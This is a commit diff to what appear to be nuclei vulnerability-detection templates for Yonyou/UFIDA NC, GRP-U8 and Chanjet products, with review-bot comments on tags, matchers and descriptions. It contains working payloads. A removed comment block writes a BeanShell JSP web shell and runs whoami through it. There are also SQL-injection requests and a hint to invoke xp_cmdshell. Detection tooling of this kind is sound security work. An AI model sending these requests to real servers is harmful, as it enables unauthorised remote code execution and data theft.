updated-templates-p

patch-1
Prince Chaddha 2023-09-17 14:21:38 +05:30
parent 88153faaf8
commit 274c14e763
14 changed files with 29 additions and 81 deletions


@ -1,11 +1,11 @@
id: yonyou-nc-uapjs-jsinvoke-fileupload id: CNVD-C-2023-76801
info: info:
name: Yonyou NC uapjs jsinvoke 文件上传漏洞 name: UFIDA NC uapjs - RCE vulnerability
author: SleepingBag945 author: SleepingBag945
severity: critical severity: critical
description: 用友NC 及 NCC系统存在任意方法调用漏洞通过uapjs (jsinvoke)利用漏洞可调用危险方法造成攻击。 description: There is an arbitrary method calling vulnerability in UFIDA NC and NCC systems. By exploiting the vulnerability through uapjs (jsinvoke), dangerous methods can be called to cause attacks.
tags: yonyou tags: cvnd,cvnd2023,yonyou,rce
http: http:
- raw: - raw:
@ -28,15 +28,3 @@ http:
- status_code_1 == 200 - status_code_1 == 200
- status_code_2 == 200 && contains(body_2,"{{randstr_2}}") - status_code_2 == 200 && contains(body_2,"{{randstr_2}}")
condition: and condition: and
# POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
# Host: {{Hostname}}
# {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/404.jsp"]}
# POST /cmdb.jsp?error=bsh.Interpreter HTTP/1.1
# Host: {{Hostname}}
# cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("whoami").getInputStream())
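Review bot: The tags on the new side, `cvnd,cvnd2023`, do not match the new id `CNVD-C-2023-76801`; the database is CNVD, so the line should read `tags: cnvd,cnvd2023,yonyou,rce`, otherwise a filter on the cnvd tag will miss this template. The new name `UFIDA NC uapjs - RCE vulnerability` could also drop the trailing word "vulnerability" to follow the `Product Component - Impact` form used elsewhere in this commit, e.g. `name: UFIDA NC uapjs - RCE`. The request and matcher lines between the two hunks are outside the hunk.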


@ -1,7 +1,7 @@
id: CVE-2022-0342 id: CVE-2022-0342
info: info:
name: Zyxel - Authentication Bypass name: Zyxel - Authentication Bypass
author: SleepingBag945 author: SleepingBag945
severity: critical severity: critical
description: | description: |
@ -10,7 +10,7 @@ info:
max-request: 1 max-request: 1
fofa-query: app="ZyXEL-USG-FLEX" fofa-query: app="ZyXEL-USG-FLEX"
verified: true verified: true
tags: cve,cve2022,zyxel,auth-bypass tags: cve,cve2022,zyxel,auth-bypass,router
http: http:
- method: GET - method: GET


@ -1,11 +1,11 @@
id: chanjet-gnremote-sqli id: chanjet-gnremote-sqli
info: info:
name: Changjietong Remote Communication GNRemote.dll - SQL Injection name: Changjietong Remote Communication GNRemote.dll - SQL Injection
author: SleepingBag945 author: SleepingBag945
severity: high severity: high
description: | description: |
Changjietong Information Technology Co., Ltd. is a company dedicated to providing platform services, application services, and data value-added services with financial and management services as its core to China's small and micro enterprises. Changjietong Information Technology Co., Ltd. Chanjetong has a SQL injection vulnerability, which can be used by attackers to obtain sensitive information in the database. Chanjetong has a SQL injection vulnerability, which can be used by attackers to obtain sensitive information in the database.
reference: | reference: |
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/90103c248a2c52bb0a060d0ee95d5a67e4579c3d/docs/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9A%E8%BF%9C%E7%A8%8B%E9%80%9A%20GNRemote.dll%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/90103c248a2c52bb0a060d0ee95d5a67e4579c3d/docs/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9A%E8%BF%9C%E7%A8%8B%E9%80%9A%20GNRemote.dll%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
metadata: metadata:
@ -38,14 +38,8 @@ http:
part: body_1 part: body_1
words: words:
- "{\"RetCode\":0}" - "{\"RetCode\":0}"
condition: and
- type: word - type: word
part: body_2 part: body_2
words: words:
- "{\"RetCode\":2}" - "{\"RetCode\":2}"
condition: and
- type: status
status:
- 200
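Review bot: With the `- type: status` matcher removed, detection now rests only on the body fragments `{"RetCode":0}` and `{"RetCode":2}`; if the endpoint can echo those fragments with a non-200 status (an error response carrying the same JSON, for instance), the template will still fire, so confirm that was intended or keep a status check next to the word matchers. The two `condition: and` removals are fine, since each `words` list holds a single entry. The `matchers-condition` that ties these matchers together sits outside the hunk.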


@ -28,6 +28,7 @@ http:
- "<configuration>" - "<configuration>"
condition: and condition: and
- type: status - type: word
status: part: header
- 200 words:
- "application/octet-stream"
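Review bot: The new header word matcher compares `application/octet-stream` case-sensitively, which is the default for `type: word`; a server that emits `Application/Octet-Stream` would not match, where the replaced status check was indifferent to it. Add `case-insensitive: true` beneath `part: header` so the Content-Type comparison tolerates the casing variants seen in the wild. The enclosing http request and its `matchers-condition` start outside the hunk.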


@ -3,7 +3,7 @@ id: chanjet-tplus-fileupload
info: info:
name: UFIDA Chanjet TPluse Upload.aspx - Arbitrary File Upload name: UFIDA Chanjet TPluse Upload.aspx - Arbitrary File Upload
author: SleepingBag945 author: SleepingBag945
severity: critical severity: high
description: | description: |
There is an arbitrary file upload vulnerability in the Upload.aspx interface of UFIDA Chanjet TPlus. An attacker can use the preload parameter to bypass authentication to upload files and control the server. There is an arbitrary file upload vulnerability in the Upload.aspx interface of UFIDA Chanjet TPlus. An attacker can use the preload parameter to bypass authentication to upload files and control the server.
reference: reference:
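Review bot: The severity is lowered from critical to high while the unchanged description on the following lines still states that an attacker can bypass authentication, upload files and `control the server`; an unauthenticated upload that yields server control appears to be rated critical by the other templates in this commit, so either keep `severity: critical` or add a sentence to the description naming the constraint that justifies high. The request and matchers of this template are outside the hunk.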


@ -20,20 +20,15 @@ http:
POST /tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword HTTP/1.1 POST /tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
{"AccountNum":"123 or 8767 IN (SELECT (sys.fn_sqlvarbasetostr(HASHBYTES('MD5','1'))))","UserName":"admin","Password":"e10adc3949ba59abbe56e057f20f883e","rdpYear":"2021","rdpMonth":"12","rdpDate":"9","webServiceProcessID":"admin","ali_csessionid":"","ali_sig":"","ali_token":"","ali_scene":"","role":"","aqdKey":"","fromWhere":"browser","cardNo":""} {"AccountNum":"123 or 8767 IN (SELECT (sys.fn_sqlvarbasetostr(HASHBYTES('MD5','1'))))","UserName":"admin","Password":"e10adc3949ba59abbe56e057f20f883e","rdpYear":"2021","rdpMonth":"12","rdpDate":"9","webServiceProcessID":"admin","ali_csessionid":"","ali_sig":"","ali_token":"","ali_scene":"","role":"","aqdKey":"","fromWhere":"browser","cardNo":""}
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
part: body
words: words:
- "0x06d49632c9dc9bcb62aeaef99612ba6b" - "0x06d49632c9dc9bcb62aeaef99612ba6b"
- "Message\":\"245" - "Message\":\"245"
- "DatabaseException" - "DatabaseException"
part: body
condition: and condition: and
- type: status
status:
- 200


@ -1,21 +0,0 @@
id: chanjetcrm-createsite-sqli
info:
name: Chanjetcrm - create_site SQL Injection
author: unknown
severity: critical
description: |
There is an SQL injection vulnerability in the Changjetcrm financial crm system under Yonyou.
reference:
- https://stack.chaitin.com/techblog/detail?id=10
tags: chanjetcrm,sqli
http:
- method: GET
path:
- "{{BaseURL}}/WebSer~1/create_site.php?site_id=1"
matchers:
- type: word
words:
- "register fail,please again"
part: body


@ -1,4 +1,4 @@
id: yonyou-nc-filereceiveservlet-fileupload id: yonyou-filereceiveservlet-fileupload
info: info:
name: Yonyou NC FileReceiveServlet - Aribitrary File Upload name: Yonyou NC FileReceiveServlet - Aribitrary File Upload
@ -12,7 +12,7 @@ info:
max-request: 1 max-request: 1
fofa-query: app="用友-UFIDA-NC" fofa-query: app="用友-UFIDA-NC"
verified: true verified: true
tags: yonyou,nc,fileupload,intrusive tags: yonyou,fileupload,intrusive
variables: variables:
file_name: "{{to_upper(rand_text_alphanumeric(5))}}.jsp" file_name: "{{to_upper(rand_text_alphanumeric(5))}}.jsp"
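Review bot: The context line `name: Yonyou NC FileReceiveServlet - Aribitrary File Upload` carries a typo that survives the rename; since the id and tags are touched anyway, change it to `name: Yonyou NC FileReceiveServlet - Arbitrary File Upload`. Dropping the `nc` tag while the name and `fofa-query` still identify the product as NC is presumably deliberate, matching the other tag edits in this commit, but it removes the only way to select NC-specific templates by tag.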


@ -1,10 +1,10 @@
id: yonyou-grp-u8-sqli id: yonyou-grp-u8-xxe
info: info:
name: yonyou-grp-u8-sqli name: Yonyou UFIDA GRP-u8 - XXE
author: SleepingBag945 author: SleepingBag945
severity: critical severity: critical
description: 用友GRP-u8存在XXE漏洞该漏洞源于应用程序解析XML输入时没有进制外部实体的加载导致可加载外部SQL语句以及命令执行 description: UFIDA GRP-u8 has an XXE vulnerability. This vulnerability is caused by the application not loading external entities when parsing XML input, resulting in the loading of external SQL statements and command execution.
reference: reference:
- http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20GRP-U8%20Proxy%20SQL%E6%B3%A8%E5%85%A5%20CNNVD-201610-923.html - http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20GRP-U8%20Proxy%20SQL%E6%B3%A8%E5%85%A5%20CNNVD-201610-923.html
tags: yonyou,grp,xxe,sqli tags: yonyou,grp,xxe,sqli
@ -14,26 +14,17 @@ http:
- | - |
POST /Proxy HTTP/1.1 POST /Proxy HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip Accept-Encoding: gzip
cVer=9.8.0&dp=%3c?xml%20version%3d%221.0%22%20encoding%3d%22GB2312%22?%3e%3cR9PACKET%20version%3d%221%22%3e%3cDATAFORMAT%3eXML%3c%2fDATAFORMAT%3e%3cR9FUNCTION%3e%3cNAME%3eAS_DataRequest%3c%2fNAME%3e%3cPARAMS%3e%3cPARAM%3e%3cNAME%3eProviderName%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3eDataSetProviderData%3c%2fDATA%3e%3c%2fPARAM%3e%3cPARAM%3e%3cNAME%3eData%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3e%20select%2042540%2a41369%20%3c%2fDATA%3e%3c%2fPARAM%3e%3c%2fPARAMS%3e%3c%2fR9FUNCTION%3e%3c%2fR9PACKET%3e cVer=9.8.0&dp=%3c?xml%20version%3d%221.0%22%20encoding%3d%22GB2312%22?%3e%3cR9PACKET%20version%3d%221%22%3e%3cDATAFORMAT%3eXML%3c%2fDATAFORMAT%3e%3cR9FUNCTION%3e%3cNAME%3eAS_DataRequest%3c%2fNAME%3e%3cPARAMS%3e%3cPARAM%3e%3cNAME%3eProviderName%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3eDataSetProviderData%3c%2fDATA%3e%3c%2fPARAM%3e%3cPARAM%3e%3cNAME%3eData%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3e%20select%2042540%2a41369%20%3c%2fDATA%3e%3c%2fPARAM%3e%3c%2fPARAMS%3e%3c%2fR9FUNCTION%3e%3c%2fR9PACKET%3e
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
words: words:
- "1759837260" - "1759837260"
- type: word - type: word
words: words:
- "<R9PACKET>" - "<R9PACKET>"
- type: status
status:
- 200
# 可尝试启动并调用xpcmdshell执行命令
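Review bot: The translated description inverts the cause: `the application not loading external entities` should read `the application not disabling the loading of external entities when parsing XML input`, which is what the Chinese source says (禁止, misspelled there as 进制). The rename from `yonyou-grp-u8-sqli` to `yonyou-grp-u8-xxe` also sits oddly with the request and matchers: the `dp` payload asks the server to evaluate `select 42540*41369`, the first matcher looks for its product `1759837260`, and the only reference is a SQL-injection write-up, so the XML appears to be the carrier and the detected condition is SQL evaluation; either the id and name should say SQL injection or the description should explain why XXE is the primary class. The second hunk starts inside the `raw` list, whose opening is outside the hunk.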


@ -22,5 +22,5 @@ http:
matchers: matchers:
- type: dsl - type: dsl
dsl: dsl:
- 'status_code_1 == 200 && contains(body_1,"java.io")' - 'status_code_1 == 200 && contains(body_1,"java.io") && contains(body_1,"EOFExceptionYI")'
condition: and condition: and
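Review bot: The new token `EOFExceptionYI` is opaque to the next maintainer; it presumably matches `java.io.EOFException` plus the bytes that follow it in a serialized Java error stream, but nothing on the page says so. Add a comment above the dsl entry, e.g. `# "EOFExceptionYI": exception class name plus the serialized-stream bytes that follow it in the error body -- TODO confirm against a captured response`, or describe the provenance in the template description. The request this matcher belongs to is outside the hunk.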


@ -11,7 +11,7 @@ info:
metadata: metadata:
fofa-query: icon_hash="1085941792" fofa-query: icon_hash="1085941792"
verified: true verified: true
tags: yonyou,nc,intrusive tags: yonyou,intrusive,fileupload
http: http:
- raw: - raw:


@ -13,7 +13,7 @@ info:
max-request: 2 max-request: 2
fofa-query: app="用友-UFIDA-NC fofa-query: app="用友-UFIDA-NC
verified: true verified: true
tags: yonyou,nc,intrusive tags: yonyou,intrusive,ufida,fileupload
variables: variables:
v1: "{{rand_int(1,100)}}" v1: "{{rand_int(1,100)}}"
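Review bot: The context line `fofa-query: app="用友-UFIDA-NC` is missing its closing double quote, so the metadata query is malformed as copied; it should be `fofa-query: app="用友-UFIDA-NC"`. The same truncated value appears in the ncmessageservlet template's `fofa-query` line in the next file section. YAML accepts the unbalanced quote inside a plain scalar, which is why no linter flags it.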


@ -1,7 +1,7 @@
id: yonyou-nc-ncmessageservlet-rce id: yonyou-nc-ncmessageservlet-rce
info: info:
name: UFIDA NC NCMessageServlet - Deserialization RCE Detect name: UFIDA NC NCMessageServlet - Deserialization RCE Detection
author: SleepingBag945 author: SleepingBag945
severity: critical severity: critical
description: | description: |
@ -12,7 +12,7 @@ info:
max-request: 2 max-request: 2
fofa-query: app="用友-UFIDA-NC fofa-query: app="用友-UFIDA-NC
verified: true verified: true
tags: yonyou,rce,deserialization,nc tags: yonyou,rce,deserialization,rce
http: http:
- raw: - raw:
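Review bot: The new tags line `tags: yonyou,rce,deserialization,rce` lists `rce` twice; the edit that replaced `nc` appears to have duplicated the existing tag, so it should read `tags: yonyou,rce,deserialization`. The request and matchers of this template are outside the hunk.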


@ -1,7 +1,7 @@
id: yonyou-u8-crm-lfi id: yonyou-u8-crm-lfi
info: info:
name: UFIDA U8 CRM getemaildata.php - Arbitrary File Read name: UFIDA U8 CRM getemaildata.php - Arbitrary File Read
author: SleepingBag945 author: SleepingBag945
severity: high severity: high
description: | description: |